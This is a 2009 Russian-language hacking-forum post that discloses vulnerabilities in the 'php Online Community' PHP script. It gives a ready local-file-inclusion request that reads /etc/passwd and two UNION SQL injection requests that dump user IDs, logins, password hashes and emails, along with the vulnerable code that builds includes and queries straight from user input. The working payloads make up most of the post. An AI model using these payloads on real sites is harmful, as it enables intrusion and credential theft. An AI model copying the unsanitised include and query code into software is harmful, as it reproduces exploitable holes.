ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

php Online Community
  #1  
Старый 26.03.2009, 12:05
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию php Online Community

php Online Community
Версия: хез, офф сайт не нашел (
Офф сайт: хез, офф сайт не нашел (
Скачать: http://allskripts.ru/other_scripts/cms/256-php-online-community.html

LFI
Уязвимый скрипт: index.php
Запрос: http://localhost/phponline/?d=../../../../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
PHP код:
// core.class.php
$d=$_GET[d]; if($d==""$d=$_POST[d];

// index.php
if(file_exists($d.".inc.php")==1) include($d.".inc.php");
else include(
"home.inc.php"); 
SQL-INJ
Уязвимый скрипт: alben.inc.php
Зависимость: magic_quotes = off
Запрос: index.php?d=alben&a=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,0x3e,id,user,pass,email,0x3c212d2d),12,13,14,15, 16,17,18,19,20,21,22,23,24+FROM+oc_user+LIMIT+0,1--+
Уязвимый кусок кода:
PHP код:
<?php

$a
=$_GET[a];
$seite=$_GET[seite];
if(!
$seite || $seite==0$sza=0;
else 
$sza $seite 10 1;
$acc=0;

$getaaa=mysql_query("SELECT * FROM oc_fotos_alben WHERE user='".$a."'");
$getff=mysql_query("SELECT * FROM oc_fotos_alben WHERE user='".$a."' ORDER BY datum DESC LIMIT $sza,10");
$getvv=mysql_query("SELECT * FROM oc_user WHERE id='".$a."'"); $getv=mysql_fetch_array($getvv);
echo 
"<b>Fotoalben von: <img src=images/user_".$getv[geschlecht].".png width=16 height=16 align=absmiddle><a href=\"".genURL($modrw,'profil/'.urlencode($getv[user]).'/','index.php?d=profil&s='.urlencode($getv[user]))."\">".ucfirst($getv[user])."</a></b>";
SQL-INJ
Уязвимый скрипт: blog.inc.php
Зависимость: magic_quotes = off
Запрос: index.php?d=blog&e=-1'+union+select+1,2,3,concat_ws(0x3a,0x3e,id,user, pass,email,0x3c212d2d),5+from+oc_user+--+
Уязвимый кусок кода:
В целом - целиком весь файл ..
PHP код:
$gettt=mysql_query("SELECT * FROM oc_blogs_kommentare WHERE beitrag='".$e."' ORDER BY datum LIMIT $sza,10");

$aaanz=mysql_num_rows($getaaa);
$ap1=$sza+1;
$dsanz=$ap1+9;
if(
$aaanz<$dsanz$dsanz=$aaanz;
$ans=ceil($aaanz/10);
$aks=$seite+1;
$next=$seite+1;
$prev=$seite-1;

echo 
"<img src=images/table_edit.png width=16 height=16 align=absmiddle> <a href=".genURL($modrw,'login/blogkommentar/'.$e.'/','index.php?d=login&s=blogkommentar&u='.$e).">Kommentar schreiben</a><br><br>";

if(
mysql_num_rows($getaaa)!=0) {

echo 
"<table border=0 cellspacing=0 cellpadding=5 align=center>";
while(
$getg=mysql_fetch_array($gettt)) { 
Глянул пару файлов и хватит. Очень дырявый движок, без уязвимостей только картинки ..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Форум ***** kezz Болталка 23 05.01.2009 19:11
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ